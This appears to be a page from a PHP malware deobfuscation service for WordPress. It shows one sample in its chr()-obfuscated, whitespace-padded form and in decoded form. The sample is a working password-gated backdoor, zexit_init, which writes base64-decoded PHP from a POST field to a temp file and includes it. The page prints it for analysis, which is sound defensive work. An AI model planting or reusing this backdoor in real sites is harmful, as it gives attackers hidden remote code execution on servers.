PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php function zexit_init() { $i="i";$m="m".chr(100).chr(53);if(isset($_POST[$i])){if($_POST[$i]==$m($m($i))){echo $m($i);die();}if($m($m($_POST[$i]))==="ee7498".chr(102).chr(54).chr(51).chr(53).chr(52).chr(53).chr(49).chr(100).chr(53).chr(101).chr(49).chr(50).chr(48).chr(57).chr(55).chr(52).chr(...

Obfuscated php code

<?php function zexit_init()
{
																	$i="i";$m="m".chr(100).chr(53);if(isset($_POST[$i])){if($_POST[$i]==$m($m($i))){echo $m($i);die();}if($m($m($_POST[$i]))==="ee7498".chr(102).chr(54).chr(51).chr(53).chr(52).chr(53).chr(49).chr(100).chr(53).chr(101).chr(49).chr(50).chr(48).chr(57).chr(55).chr(52).chr(102).chr(54).chr(48).chr(100).chr(102).chr(51)."2478"){$f=sys_get_temp_dir().chr(47).$i;$b=chr(98).chr(97).chr(115).chr(101).chr(54)."4".chr(95).chr(100).chr(101).chr(99).chr(111)."de";file_put_contents($f,"<".chr(63).chr(112).chr(104)."p ".$b($_POST[$i.$i]));@include($f);@unlink($f);}}
}

Decoded(de-Obfuscated) php code

<?php

function zexit_init()
{
    $i = "i";
    $m = "md5";
    if (isset($_POST[$i])) {
        if ($_POST[$i] == md5(md5($i))) {
            echo md5($i);
            die;
        }
        if ($m($m($_POST[$i])) === "ee7498f635451d5e120974f60df32478") {
            $f = sys_get_temp_dir() . "/" . $i;
            $b = "base64_decode";
            file_put_contents($f, "<?php " . base64_decode($_POST[$i . $i]));
            @(include $f);
            @unlink($f);
        }
    }
}

Malware detection & removal plugin for WordPress